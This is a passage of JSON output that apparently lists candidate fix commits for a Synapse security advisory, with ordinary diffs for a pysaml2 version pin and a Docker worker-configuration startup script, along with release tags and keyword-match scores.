"tests/federation/test_complexity.py", + "tests/federation/test_federation_server.py", + "tests/federation/transport/test_server.py", + "tests/handlers/test_directory.py", + "tests/handlers/test_message.py", + "tests/handlers/test_password_providers.py", + "tests/handlers/test_typing.py", + "tests/handlers/test_user_directory.py", + "tests/http/test_additional_resource.py", + "tests/push/test_http.py", + "tests/replication/test_auth.py", + "tests/replication/test_client_reader_shard.py", + "tests/replication/test_multi_media_repo.py", + "tests/replication/test_sharded_event_persister.py", + "tests/rest/admin/test_admin.py", + "tests/rest/admin/test_device.py", + "tests/rest/admin/test_event_reports.py", + "tests/rest/admin/test_media.py", + "tests/rest/admin/test_room.py", + "tests/rest/admin/test_statistics.py", + "tests/rest/admin/test_user.py", + "tests/rest/client/test_consent.py", + "tests/rest/client/test_ephemeral_message.py", + "tests/rest/client/test_identity.py", + "tests/rest/client/test_redactions.py", + "tests/rest/client/test_retention.py", + "tests/rest/client/test_shadow_banned.py", + "tests/rest/client/test_third_party_rules.py", + "tests/rest/client/v1/test_directory.py", + "tests/rest/client/v1/test_events.py", + "tests/rest/client/v1/test_login.py", + "tests/rest/client/v1/test_presence.py", + "tests/rest/client/v1/test_profile.py", + "tests/rest/client/v1/test_push_rule_attrs.py", + "tests/rest/client/v1/test_rooms.py", + "tests/rest/client/v1/test_typing.py", + "tests/rest/client/v1/utils.py", + "tests/rest/client/v2_alpha/test_account.py", + "tests/rest/client/v2_alpha/test_auth.py", + "tests/rest/client/v2_alpha/test_capabilities.py", + "tests/rest/client/v2_alpha/test_filter.py", + "tests/rest/client/v2_alpha/test_password_policy.py", + "tests/rest/client/v2_alpha/test_register.py", + "tests/rest/client/v2_alpha/test_relations.py", + "tests/rest/client/v2_alpha/test_shared_rooms.py", + "tests/rest/client/v2_alpha/test_sync.py", + "tests/rest/media/v1/test_media_storage.py", + "tests/rest/media/v1/test_url_preview.py", + "tests/rest/test_health.py", + "tests/rest/test_well_known.py", + "tests/server.py", + "tests/server_notices/test_consent.py", + "tests/server_notices/test_resource_limits_server_notices.py", + "tests/test_mau.py", + "tests/test_server.py", + "tests/test_terms_auth.py", + "tests/unittest.py" + ], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "v1.25.0", + "v1.25.0rc1", + "v1.26.0", + "v1.26.0-deb", + "v1.26.0rc1", + "v1.26.0rc2", + "v1.27.0", + "v1.27.0rc1", + "v1.27.0rc2", + "v1.28.0", + "v1.28.0rc1", + "v1.29.0", + "v1.29.0rc1", + "v1.30.0", + "v1.30.0rc1", + "v1.30.1", + "v1.31.0", + "v1.31.0rc1", + "v1.32.0", + "v1.32.0rc1", + "v1.32.1", + "v1.32.2", + "v1.33.0", + "v1.33.0rc1", + "v1.33.0rc2", + "v1.33.1", + "v1.33.2", + "v1.34.0", + "v1.34.0rc1", + "v1.35.0", + "v1.35.0rc1", + "v1.35.0rc2", + "v1.35.0rc3", + "v1.35.1", + "v1.36.0", + "v1.36.0rc1", + "v1.36.0rc2", + "v1.37.0", + "v1.37.0rc1", + "v1.37.1", + "v1.37.1a1", + "v1.37.1rc1", + "v1.38.0", + "v1.38.0rc1", + "v1.38.0rc2", + "v1.38.0rc3", + "v1.38.1", + "v1.39.0", + "v1.39.0rc1", + "v1.39.0rc2", + "v1.39.0rc3", + "v1.40.0", + "v1.40.0rc1", + "v1.40.0rc2", + "v1.40.0rc3", + "v1.41.0", + "v1.41.0rc1", + "v1.41.1", + "v1.42.0", + "v1.42.0rc1", + "v1.42.0rc2", + "v1.43.0", + "v1.43.0rc1", + "v1.43.0rc2", + "v1.44.0", + "v1.44.0rc1", + "v1.44.0rc2", + "v1.44.0rc3", + "v1.45.0", + "v1.45.0rc1", + "v1.45.0rc2", + "v1.45.1", + "v1.46-modular1", + "v1.46.0", + "v1.46.0rc1", + "v1.47.0", + "v1.47.0rc1", + "v1.47.0rc2", + "v1.47.0rc3", + "v1.47.1", + "v1.48.0", + "v1.48.0rc1", + "v1.49.0", + "v1.49.0rc1", + "v1.49.1", + "v1.49.2", + "v1.50.0", + "v1.50.0rc1", + "v1.50.0rc2", + "v1.50.1", + "v1.50.2", + "v1.51.0", + "v1.51.0rc1", + "v1.51.0rc2", + "v1.52.0", + "v1.52.0rc1", + "v1.53.0", + "v1.53.0rc1", + "v1.54.0", + "v1.54.0rc1", + "v1.55.0", + "v1.55.0rc1", + "v1.55.1", + "v1.55.2", + "v1.56.0", + "v1.56.0rc1", + "v1.57.0", + "v1.57.0rc1", + "v1.57.1", + "v1.58.0", + "v1.58.0rc1", + "v1.58.0rc2", + "v1.58.1", + "v1.59.0", + "v1.59.0rc1", + "v1.59.0rc2", + "v1.59.1", + "v1.60.0", + "v1.60.0rc1", + "v1.60.0rc2", + "v1.61.0", + "v1.61.0rc1", + "v1.61.1", + "v1.62.0", + "v1.62.0rc1", + "v1.62.0rc2", + "v1.62.0rc3", + "v1.63.0", + "v1.63.0rc1", + "v1.63.1", + "v1.64.0", + "v1.64.0rc1", + "v1.64.0rc2", + "v1.65.0", + "v1.65.0.post1.dev1", + "v1.65.0rc1", + "v1.65.0rc2", + "v1.66.0", + "v1.66.0rc1", + "v1.66.0rc2", + "v1.67.0", + "v1.67.0rc1", + "v1.68.0", + "v1.68.0rc1", + "v1.68.0rc2", + "v1.69.0", + "v1.69.0rc1", + "v1.69.0rc2", + "v1.69.0rc3", + "v1.69.0rc4", + "v1.70.0", + "v1.70.0rc1", + "v1.70.0rc2", + "v1.70.1", + "v1.71.0", + "v1.71.0rc1", + "v1.71.0rc2", + "v1.72.0", + "v1.72.0rc1", + "v1.73.0", + "v1.73.0rc1", + "v1.73.0rc2", + "v1.74.0", + "v1.74.0rc1", + "v1.75.0", + "v1.75.0rc1", + "v1.75.0rc2", + "v1.76.0", + "v1.76.0rc1", + "v1.76.0rc2", + "v1.77.0", + "v1.77.0rc1", + "v1.77.0rc2", + "v1.78.0", + "v1.78.0rc1", + "v1.79.0", + "v1.79.0rc1", + "v1.79.0rc2", + "v1.80.0", + "v1.80.0rc1", + "v1.80.0rc2", + "v1.81.0", + "v1.81.0rc1", + "v1.81.0rc2", + "v1.82.0", + "v1.82.0rc1", + "v1.83.0", + "v1.83.0rc1", + "v1.84.0", + "v1.84.0rc1", + "v1.84.1", + "v1.85.0", + "v1.85.0rc1", + "v1.85.0rc2", + "v1.85.1", + "v1.85.2", + "v1.86.0", + "v1.86.0rc1", + "v1.86.0rc2", + "v1.87.0", + "v1.87.0rc1", + "v1.88.0", + "v1.88.0rc1", + "v1.89.0", + "v1.89.0rc1", + "v1.90.0", + "v1.90.0rc1", + "v1.91.0", + "v1.91.0rc1", + "v1.91.1", + "v1.91.2", + "v1.92.0", + "v1.92.0rc1", + "v1.92.1", + "v1.92.2", + "v1.92.3", + "v1.93.0", + "v1.93.0rc1", + "v1.94.0", + "v1.94.0rc1", + "v1.95.0", + "v1.95.0rc1", + "v1.95.1", + "v1.96.0", + "v1.96.0rc1", + "v1.96.1", + "v1.97.0", + "v1.97.0rc1", + "v1.98.0", + "v1.98.0rc1" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: well-known", + "relevance": 8 + }, + { + "id": "ADV_KEYWORDS_IN_MSG", + "message": "The commit message and the advisory description contain the following keywords: request", + "relevance": 4 + }, + { + "id": "ADV_KEYWORDS_IN_FILES", + "message": "An advisory keyword is contained in the changed files: server, federation, know, resource, file", + "relevance": 4 + } + ] + }, + { + "commit_id": "0eb9b2f86667a059f692d71d5c224c173498bb7b", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1607452885, + "hunks": 2, + "message": "Fix installing pysaml2 on Python 3.5. (#8898) This pins pysaml2 to < 6.4.0 on Python 3.5, as the last known working version.", + "diff": [ + "diff --git a/changelog.d/8898.misc b/changelog.d/8898.misc", + "new file mode 100644", + "index 000000000..bdb0d40d5", + "--- /dev/null", + "+++ b/changelog.d/8898.misc", + "@@ -0,0 +1 @@", + "+Add a maximum version for pysaml2 on Python 3.5.", + "diff --git a/synapse/python_dependencies.py b/synapse/python_dependencies.py", + "index aab77fc45..040f76bb5 100644", + "--- a/synapse/python_dependencies.py", + "+++ b/synapse/python_dependencies.py", + "@@ -101,3 +101,7 @@ CONDITIONAL_REQUIREMENTS = {", + " ],", + "- \"saml2\": [\"pysaml2>=4.5.0\"],", + "+ \"saml2\": [", + "+ # pysaml2 6.4.0 is incompatible with Python 3.5 (see https://github.com/IdentityPython/pysaml2/issues/749)", + "+ \"pysaml2>=4.5.0,<6.4.0;python_version<'3.6'\",", + "+ \"pysaml2>=4.5.0;python_version>='3.6'\",", + "+ ],", + " \"oidc\": [\"authlib>=0.14.0\"]," + ], + "changed_files": [ + "changelog.d/8898.misc", + "synapse/python_dependencies.py" + ], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": { + "8898": "" + }, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "1a9553045c239160e4c9d6aff1f9adb7fd7d7193" + ] + ], + "tags": [ + "v1.23.1", + "v1.25.0", + "v1.25.0rc1", + "v1.26.0", + "v1.26.0-deb", + "v1.26.0rc1", + "v1.26.0rc2", + "v1.27.0", + "v1.27.0rc1", + "v1.27.0rc2", + "v1.28.0", + "v1.28.0rc1", + "v1.29.0", + "v1.29.0rc1", + "v1.30.0", + "v1.30.0rc1", + "v1.30.1", + "v1.31.0", + "v1.31.0rc1", + "v1.32.0", + "v1.32.0rc1", + "v1.32.1", + "v1.32.2", + "v1.33.0", + "v1.33.0rc1", + "v1.33.0rc2", + "v1.33.1", + "v1.33.2", + "v1.34.0", + "v1.34.0rc1", + "v1.35.0", + "v1.35.0rc1", + "v1.35.0rc2", + "v1.35.0rc3", + "v1.35.1", + "v1.36.0", + "v1.36.0rc1", + "v1.36.0rc2", + "v1.37.0", + "v1.37.0rc1", + "v1.37.1", + "v1.37.1a1", + "v1.37.1rc1", + "v1.38.0", + "v1.38.0rc1", + "v1.38.0rc2", + "v1.38.0rc3", + "v1.38.1", + "v1.39.0", + "v1.39.0rc1", + "v1.39.0rc2", + "v1.39.0rc3", + "v1.40.0", + "v1.40.0rc1", + "v1.40.0rc2", + "v1.40.0rc3", + "v1.41.0", + "v1.41.0rc1", + "v1.41.1", + "v1.42.0", + "v1.42.0rc1", + "v1.42.0rc2", + "v1.43.0", + "v1.43.0rc1", + "v1.43.0rc2", + "v1.44.0", + "v1.44.0rc1", + "v1.44.0rc2", + "v1.44.0rc3", + "v1.45.0", + "v1.45.0rc1", + "v1.45.0rc2", + "v1.45.1", + "v1.46-modular1", + "v1.46.0", + "v1.46.0rc1", + "v1.47.0", + "v1.47.0rc1", + "v1.47.0rc2", + "v1.47.0rc3", + "v1.47.1", + "v1.48.0", + "v1.48.0rc1", + "v1.49.0", + "v1.49.0rc1", + "v1.49.1", + "v1.49.2", + "v1.50.0", + "v1.50.0rc1", + "v1.50.0rc2", + "v1.50.1", + "v1.50.2", + "v1.51.0", + "v1.51.0rc1", + "v1.51.0rc2", + "v1.52.0", + "v1.52.0rc1", + "v1.53.0", + "v1.53.0rc1", + "v1.54.0", + "v1.54.0rc1", + "v1.55.0", + "v1.55.0rc1", + "v1.55.1", + "v1.55.2", + "v1.56.0", + "v1.56.0rc1", + "v1.57.0", + "v1.57.0rc1", + "v1.57.1", + "v1.58.0", + "v1.58.0rc1", + "v1.58.0rc2", + "v1.58.1", + "v1.59.0", + "v1.59.0rc1", + "v1.59.0rc2", + "v1.59.1", + "v1.60.0", + "v1.60.0rc1", + "v1.60.0rc2", + "v1.61.0", + "v1.61.0rc1", + "v1.61.1", + "v1.62.0", + "v1.62.0rc1", + "v1.62.0rc2", + "v1.62.0rc3", + "v1.63.0", + "v1.63.0rc1", + "v1.63.1", + "v1.64.0", + "v1.64.0rc1", + "v1.64.0rc2", + "v1.65.0", + "v1.65.0.post1.dev1", + "v1.65.0rc1", + "v1.65.0rc2", + "v1.66.0", + "v1.66.0rc1", + "v1.66.0rc2", + "v1.67.0", + "v1.67.0rc1", + "v1.68.0", + "v1.68.0rc1", + "v1.68.0rc2", + "v1.69.0", + "v1.69.0rc1", + "v1.69.0rc2", + "v1.69.0rc3", + "v1.69.0rc4", + "v1.70.0", + "v1.70.0rc1", + "v1.70.0rc2", + "v1.70.1", + "v1.71.0", + "v1.71.0rc1", + "v1.71.0rc2", + "v1.72.0", + "v1.72.0rc1", + "v1.73.0", + "v1.73.0rc1", + "v1.73.0rc2", + "v1.74.0", + "v1.74.0rc1", + "v1.75.0", + "v1.75.0rc1", + "v1.75.0rc2", + "v1.76.0", + "v1.76.0rc1", + "v1.76.0rc2", + "v1.77.0", + "v1.77.0rc1", + "v1.77.0rc2", + "v1.78.0", + "v1.78.0rc1", + "v1.79.0", + "v1.79.0rc1", + "v1.79.0rc2", + "v1.80.0", + "v1.80.0rc1", + "v1.80.0rc2", + "v1.81.0", + "v1.81.0rc1", + "v1.81.0rc2", + "v1.82.0", + "v1.82.0rc1", + "v1.83.0", + "v1.83.0rc1", + "v1.84.0", + "v1.84.0rc1", + "v1.84.1", + "v1.85.0", + "v1.85.0rc1", + "v1.85.0rc2", + "v1.85.1", + "v1.85.2", + "v1.86.0", + "v1.86.0rc1", + "v1.86.0rc2", + "v1.87.0", + "v1.87.0rc1", + "v1.88.0", + "v1.88.0rc1", + "v1.89.0", + "v1.89.0rc1", + "v1.90.0", + "v1.90.0rc1", + "v1.91.0", + "v1.91.0rc1", + "v1.91.1", + "v1.91.2", + "v1.92.0", + "v1.92.0rc1", + "v1.92.1", + "v1.92.2", + "v1.92.3", + "v1.93.0", + "v1.93.0rc1", + "v1.94.0", + "v1.94.0rc1", + "v1.95.0", + "v1.95.0rc1", + "v1.95.1", + "v1.96.0", + "v1.96.0rc1", + "v1.96.1", + "v1.97.0", + "v1.97.0rc1", + "v1.98.0", + "v1.98.0rc1" + ], + "matched_rules": [ + { + "id": "ADV_KEYWORDS_IN_MSG", + "message": "The commit message and the advisory description contain the following keywords: know, version, python", + "relevance": 4 + }, + { + "id": "ADV_KEYWORDS_IN_FILES", + "message": "An advisory keyword is contained in the changed files: python", + "relevance": 4 + }, + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "GITHUB_ISSUE_IN_MESSAGE", + "message": "The commit message references some github issue: 8898", + "relevance": 2 + } + ] + }, + { + "commit_id": "62ac8b9c0db62ba42934b432b10fa9d87ee68434", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1608059755, + "hunks": 11, + "message": "Get Synapse main and worker process startup working!", + "diff": [ + "diff --git a/docker/Dockerfile-workers b/docker/Dockerfile-workers", + "index 88b2a5262..a98d95d5e 100644", + "--- a/docker/Dockerfile-workers", + "+++ b/docker/Dockerfile-workers", + "@@ -7,11 +7,4 @@ RUN apt-get install -y supervisor redis nginx", + "-# A script to read environment variables and create the necessary", + "-# files to run the desired worker configuration", + "-COPY ./docker/create_worker_config_files.py /create_worker_config_files.py", + "-RUN /create_worker_config_files.py", + "-", + "-# Create a volume for logging. The official Synapse docker image", + "-# only logs to console, however this is inconvenient for multi-process", + "-# containers.", + "-VOLUME [\"/logs\"]", + "+# Copy the worker process and log configuration files", + "+COPY ./docker/workers /conf/workers/", + "@@ -20,6 +13,10 @@ EXPOSE 8008/tcp 8009/tcp 8448/tcp", + "-# Start supervisord", + "-COPY ./docker/worker_conf/supervisord.conf /etc/supervisor/conf.d/supervisord.conf", + "-ENTRYPOINT [\"/usr/bin/supervisord\"]", + "+# Volume for user-editable config files, logs etc.", + "+VOLUME [\"/data\"]", + "+", + "+# A script to read environment variables and create the necessary", + "+# files to run the desired worker configuration. Will start supervisord.", + "+COPY ./docker/configure_workers_and_start.py /configure_workers_and_start.py", + "+ENTRYPOINT [\"/configure_workers_and_start.py\"]", + "-# TODO: Healthcheck? Can we ask supervisord?", + "\\ No newline at end of file", + "+# TODO: Healthcheck? Which worker to ask? Can we ask supervisord?", + "\\ No newline at end of file", + "diff --git a/docker/configure_workers_and_start.py b/docker/configure_workers_and_start.py", + "new file mode 100755", + "index 000000000..57ae5cac8", + "--- /dev/null", + "+++ b/docker/configure_workers_and_start.py", + "@@ -0,0 +1,298 @@", + "+#!/usr/bin/env python", + "+# -*- coding: utf-8 -*-", + "+# Copyright 2020 The Matrix.org Foundation C.I.C.", + "+#", + "+# Licensed under the Apache License, Version 2.0 (the \"License\");", + "+# you may not use this file except in compliance with the License.", + "+# You may obtain a copy of the License at", + "+#", + "+# http://www.apache.org/licenses/LICENSE-2.0", + "+#", + "+# Unless required by applicable law or agreed to in writing, software", + "+# distributed under the License is distributed on an \"AS IS\" BASIS,", + "+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", + "+# See the License for the specific language governing permissions and", + "+# limitations under the License.", + "+", + "+# This script reads environment variables and generates a shared Synapse worker,", + "+# nginx and supervisord configs depending on the workers requested", + "+", + "+import os", + "+import sys", + "+import subprocess", + "+import jinja2", + "+", + "+", + "+# Utility functions", + "+def log(txt):", + "+ print(txt)", + "+", + "+", + "+def error(txt):", + "+ log(txt)", + "+ sys.exit(2)", + "+", + "+", + "+def convert(src, dst, environ):", + "+ \"\"\"Generate a file from a template", + "+", + "+ Args:", + "+ src (str): path to input file", + "+ dst (str): path to file to write", + "+ environ (dict): environment dictionary, for replacement mappings.", + "+ \"\"\"", + "+ with open(src) as infile:", + "+ template = infile.read()", + "+ rendered = jinja2.Template(template, autoescape=True).render(**environ)", + "+ with open(dst, \"w\") as outfile:", + "+ outfile.write(rendered)", + "+", + "+", + "+def generate_base_homeserver_config():", + "+ \"\"\"Starts Synapse and generates a basic homeserver config, which will later be", + "+ modified for worker support.", + "+", + "+ Raises: CalledProcessError if calling start.py return a non-zero exit code.", + "+ \"\"\"", + "+ # start.py already does this for us, so just call that.", + "+ # note that this script is copied in in the official, monolith dockerfile", + "+ subprocess.check_output([\"/usr/local/bin/python\", \"/start.py\", \"generate\"])", + "+", + "+", + "+def generate_worker_files(environ, config_path: str, data_dir: str):", + "+ \"\"\"Read the desired list of workers from environment variables and generate", + "+ shared homeserver, nginx and supervisord configs.", + "+", + "+ Args:", + "+ environ: _Environ[str]", + "+ config_path: Where to output the generated Synapse main worker config file.", + "+ data_dir: The location of the synapse data directory. Where log and", + "+ user-facing config files live.", + "+ \"\"\"", + "+ # Note that yaml cares about indentation, so care should be taken to insert lines", + "+ # into files at the correct indentation below.", + "+", + "+ # The contents of a Synapse config file that will be added alongside the generated", + "+ # config when running the main Synapse process.", + "+ # It is intended mainly for disabling functionality when certain workers are spun up.", + "+ homeserver_config = \"\"\"", + "+redis:", + "+ enabled: true", + "+", + "+# TODO: remove before prod", + "+suppress_key_server_warning: true", + "+ \"\"\"", + "+", + "+ # The supervisord config", + "+ supervisord_config = \"\"\"", + "+[supervisord]", + "+nodaemon=true", + "+", + "+[program:nginx]", + "+command=/usr/sbin/nginx -g \"daemon off;\"", + "+priority=900", + "+stdout_logfile=/dev/stdout", + "+stdout_logfile_maxbytes=0", + "+stderr_logfile=/dev/stderr", + "+stderr_logfile_maxbytes=0", + "+username=www-data", + "+autorestart=true", + "+", + "+[program:synapse_main]", + "+command=/usr/local/bin/python -m synapse.app.homeserver \\", + "+ --config-path=\"%s\" \\", + "+ --config-path=/conf/workers/shared.yaml", + "+", + "+# Log startup failures to supervisord's stdout/err", + "+# Regular synapse logs will still go in the configured data directory", + "+stdout_logfile=/dev/stdout", + "+stdout_logfile_maxbytes=0", + "+stderr_logfile=/dev/stderr", + "+stderr_logfile_maxbytes=0", + "+autorestart=unexpected", + "+exitcodes=0", + "+", + "+ \"\"\" % (config_path,)", + "+", + "+ # An nginx site config. Will live in /etc/nginx/conf.d", + "+ nginx_config_template_header = \"\"\"", + "+server {", + "+ listen 80;", + "+ listen [::]:80;", + "+", + "+ # For the federation port", + "+ listen 8448 default_server;", + "+ listen [::]:8448 default_server;", + "+", + "+ server_name localhost;", + "+ \"\"\"", + "+ nginx_config_body = \"\" # to modify below", + "+ nginx_config_template_end = \"\"\"", + "+ # Send all other traffic to the main process", + "+ location ~* ^(\\/_matrix|\\/_synapse) {", + "+ proxy_pass http://localhost:8008;", + "+ proxy_set_header X-Forwarded-For $remote_addr;", + "+", + "+ # TODO: Can we move this to the default nginx.conf so all locations are", + "+ # affected?", + "+ #", + "+ # Nginx by default only allows file uploads up to 1M in size", + "+ # Increase client_max_body_size to match max_upload_size defined in homeserver.yaml", + "+ client_max_body_size 50M;", + "+ }", + "+}", + "+ \"\"\"", + "+", + "+ # Read desired worker configuration from environment", + "+ if \"SYNAPSE_WORKERS\" not in environ:", + "+ error(\"Environment variable 'SYNAPSE_WORKERS' is mandatory.\")", + "+", + "+ worker_types = environ.get(\"SYNAPSE_WORKERS\")", + "+ worker_types = worker_types.split(\",\")", + "+", + "+ for worker_type in worker_types:", + "+ worker_type = worker_type.strip()", + "+", + "+ if worker_type == \"pusher\":", + "+ # Disable push handling from the main process", + "+ homeserver_config += \"\"\"", + "+start_pushers: false", + "+ \"\"\"", + "+", + "+ # Enable the pusher worker in supervisord", + "+ supervisord_config += \"\"\"", + "+[program:synapse_pusher]", + "+command=/usr/local/bin/python -m synapse.app.pusher \\", + "+ --config-path=\"%s\" \\", + "+ --config-path=/conf/workers/shared.yaml \\", + "+ --config-path=/conf/workers/pusher.yaml", + "+autorestart=unexpected", + "+exitcodes=0", + "+stdout_logfile=/dev/stdout", + "+stdout_logfile_maxbytes=0", + "+stderr_logfile=/dev/stderr", + "+stderr_logfile_maxbytes=0", + "+ \"\"\" % (config_path,)", + "+", + "+ # This worker does not handle any REST endpoints", + "+", + "+ elif worker_type == \"appservice\":", + "+ # Disable appservice traffic sending from the main process", + "+ homeserver_config += \"\"\"", + "+ notify_appservices: false", + "+ \"\"\"", + "+", + "+ # Enable the pusher worker in supervisord", + "+ supervisord_config += \"\"\"", + "+[program:synapse_appservice]", + "+command=/usr/local/bin/python -m synapse.app.appservice \\", + "+ --config-path=\"%s\" \\", + "+ --config-path=/conf/workers/shared.yaml \\", + "+ --config-path=/conf/workers/appservice.yaml", + "+autorestart=unexpected", + "+exitcodes=0", + "+stdout_logfile=/dev/stdout", + "+stdout_logfile_maxbytes=0", + "+stderr_logfile=/dev/stderr", + "+stderr_logfile_maxbytes=0", + "+ \"\"\" % (config_path,)", + "+", + "+ # This worker does not handle any REST endpoints", + "+", + "+ elif worker_type == \"user_dir\":", + "+ # Disable user directory updates on the main process", + "+ homeserver_config += \"\"\"", + "+update_user_directory: false", + "+ \"\"\"", + "+", + "+ # Enable the user directory worker in supervisord", + "+ supervisord_config += \"\"\"", + "+[program:synapse_user_dir]", + "+command=/usr/local/bin/python -m synapse.app.user_dir \\", + "+ --config-path=\"%s\" \\", + "+ --config-path=/conf/workers/shared.yaml \\", + "+ --config-path=/conf/workers/user_dir.yaml", + "+autorestart=unexpected", + "+exitcodes=0", + "+stdout_logfile=/dev/stdout", + "+stdout_logfile_maxbytes=0", + "+stderr_logfile=/dev/stderr", + "+stderr_logfile_maxbytes=0", + "+ \"\"\" % (config_path,)", + "+", + "+ # Route user directory requests to this worker", + "+ nginx_config_body += \"\"\"", + "+ location ~* ^/_matrix/client/(api/v1|r0|unstable)/user_directory/search$ {", + "+ proxy_pass http://localhost:8010;", + "+ proxy_set_header X-Forwarded-For $remote_addr;", + "+ }", + "+ \"\"\"", + "+", + "+ # Write out the config files", + "+", + "+ # Shared homeserver config", + "+ print(homeserver_config)", + "+ with open(\"/conf/workers/shared.yaml\", \"w\") as f:", + "+ f.write(homeserver_config)", + "+", + "+ # Nginx config", + "+ print()", + "+ print(nginx_config_template_header)", + "+ print(nginx_config_body)", + "+ print(nginx_config_template_end)", + "+ with open(\"/etc/nginx/conf.d/matrix-synapse.conf\", \"w\") as f:", + "+ f.write(nginx_config_template_header)", + "+ f.write(nginx_config_body)", + "+ f.write(nginx_config_template_end)", + "+", + "+ # Supervisord config", + "+ print()", + "+ print(supervisord_config)", + "+ with open(\"/etc/supervisor/conf.d/supervisord.conf\", \"w\") as f:", + "+ f.write(supervisord_config)", + "+", + "+ # Generate worker log config files from the templates.", + "+ # The templates are mainly there so that we can inject some environment variable", + "+ # values into them.", + "+ log_config_template_dir = \"/conf/workers/log_config_templates/\"", + "+ log_config_dir = \"/conf/workers/\"", + "+ for log_config_filename in os.listdir(log_config_template_dir):", + "+ template_path = log_config_template_dir + log_config_filename", + "+ out_path = log_config_dir + log_config_filename", + "+", + "+ convert(template_path, out_path, environ)", + "+", + "+ # Ensure the logging directory exists", + "+ log_dir = data_dir + \"/logs\"", + "+ if not os.path.exists(log_dir):", + "+ os.mkdir(log_dir)", + "+", + "+", + "+def start_supervisord():", + "+ \"\"\"Starts up supervisord which then starts and monitors all other necessary processes", + "+", + "+ Raises: CalledProcessError if calling start.py return a non-zero exit code.", + "+ \"\"\"", + "+ subprocess.check_output([\"/usr/bin/supervisord\"])", + "+", + "+", + "+def main(args, environ):", + "+ config_dir = environ.get(\"SYNAPSE_CONFIG_DIR\", \"/data\")", + "+ config_path = environ.get(\"SYNAPSE_CONFIG_PATH\", config_dir + \"/homeserver.yaml\")", + "+ data_dir = environ.get(\"SYNAPSE_DATA_DIR\", \"/data\")", + "+", + "+ # Generate the base homeserver config if one does not yet exist", + "+ if not os.path.exists(config_path):", + "+ log(\"Generating base homeserver config\")", + "+ generate_base_homeserver_config()", + "+", + "+ # Always regenerate all other config files", + "+ generate_worker_files(environ, config_path, data_dir)", + "+", + "+ # Start supervisord, which will start Synapse, all of the configured worker", + "+ # processes, redis, nginx etc. according to the config we created above.", + "+ start_supervisord()", + "+", + "+", + "+if __name__ == \"__main__\":", + "+ main(sys.argv, os.environ)", + "diff --git a/docker/generate_shared_worker_config.py b/docker/generate_shared_worker_config.py", + "deleted file mode 100644", + "index 755a73734..000000000", + "--- a/docker/generate_shared_worker_config.py", + "+++ /dev/null", + "@@ -1,145 +0,0 @@", + "-#!/usr/bin/env python", + "-# -*- coding: utf-8 -*-", + "-# Copyright 2020 The Matrix.org Foundation C.I.C.", + "-#", + "-# Licensed under the Apache License, Version 2.0 (the \"License\");", + "-# you may not use this file except in compliance with the License.", + "-# You may obtain a copy of the License at", + "-#", + "-# http://www.apache.org/licenses/LICENSE-2.0", + "-#", + "-# Unless required by applicable law or agreed to in writing, software", + "-# distributed under the License is distributed on an \"AS IS\" BASIS,", + "-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", + "-# See the License for the specific language governing permissions and", + "-# limitations under the License.", + "-", + "-# This script reads environment variables and generates a shared Synapse worker,", + "-# nginx and supervisord configs depending on the workers requested", + "-", + "-import os", + "-import sys", + "-", + "-", + "-def main(args, environ):", + "- \"\"\"Read the desired list of workers from environment variables and generate", + "- shared homeserver, nginx and supervisord configs.", + "-", + "- Args:", + "- environ: _Environ[str]", + "- \"\"\"", + "- # The contents of this string will be appended to the one generated by", + "- # the homeserver, and is intended mainly for disabling functionality on the main", + "- # when certain workers are spun up", + "- homeserver_config = \"\"", + "-", + "- # The contents of this string will be append to the base supervisord config", + "- supervisord_config = \"\"", + "-", + "- # An nginx site config. Will live in /etc/nginx/conf.d", + "- nginx_config_template_header = \"\"\"", + "- server {", + "- listen 80;", + "- listen [::]:80;", + "-", + "- # For the federation port", + "- listen 8448 default_server;", + "- listen [::]:8448 default_server;", + "-", + "- server_name localhost;", + "- \"\"\"", + "- nginx_config_body = \"\"", + "- nginx_config_template_end = \"\"\"", + "- # Send all other traffic to the main process", + "- location ~* ^(\\/_matrix|\\/_synapse) {", + "- proxy_pass http://localhost:8008;", + "- proxy_set_header X-Forwarded-For $remote_addr;", + "-", + "- # TODO: Can we move this to the default nginx.conf so all locations are", + "- # affected?", + "- #", + "- # Nginx by default only allows file uploads up to 1M in size", + "- # Increase client_max_body_size to match max_upload_size defined in homeserver.yaml", + "- client_max_body_size 50M;", + "- }", + "- }", + "- \"\"\"", + "-", + "- # Read desired worker configuration from environment", + "- worker_types = environ.get(\"SYNAPSE_WORKERS\")", + "- worker_types = worker_types.split(\",\")", + "-", + "- for worker_type in worker_types:", + "- if worker_type == \"pusher\":", + "- # Disable push handling from the main process", + "- homeserver_config += \"\"\"", + "- start_pushers: false", + "- \"\"\"", + "-", + "- # Enable the pusher worker in supervisord", + "- supervisord_config += \"\"\"", + "- \"\"\"", + "-", + "- # This worker does not handle any REST endpoints", + "-", + "- elif worker_type == \"appservice\":", + "- # Disable appservice traffic sending from the main process", + "- homeserver_config += \"\"\"", + "- notify_appservices: false", + "- \"\"\"", + "-", + "- # Enable the pusher worker in supervisord", + "- supervisord_config += \"\"\"", + "- [program:synapse_user_dir]", + "- command=/usr/local/bin/python -m synapse.app.user_dir \\", + "- --config-path=/config/homeserver.yaml \\", + "- --config-path=/config/workers/user_dir.yaml", + "- autorestart=unexpected", + "- exitcodes=0", + "- \"\"\"", + "-", + "- # This worker does not handle any REST endpoints", + "-", + "- elif worker_type == \"user_dir\":", + "- # Disable user directory updates on the main process", + "- homeserver_config += \"\"\"", + "- update_user_directory: false", + "- \"\"\"", + "-", + "- # Enable the user directory worker in supervisord", + "- supervisord_config += \"\"\"", + "- [program:synapse_user_dir]", + "- command=/usr/local/bin/python -m synapse.app.user_dir \\", + "- --config-path=/config/homeserver.yaml \\", + "- --config-path=/config/workers/user_dir.yaml", + "- autorestart=unexpected", + "- exitcodes=0", + "- \"\"\"", + "-", + "- # Route user directory requests to this worker", + "- nginx_config_body += \"\"\"", + "- location ~* ^/_matrix/client/(api/v1|r0|unstable)/user_directory/search$ {", + "- proxy_pass http://localhost:8010;", + "- proxy_set_header 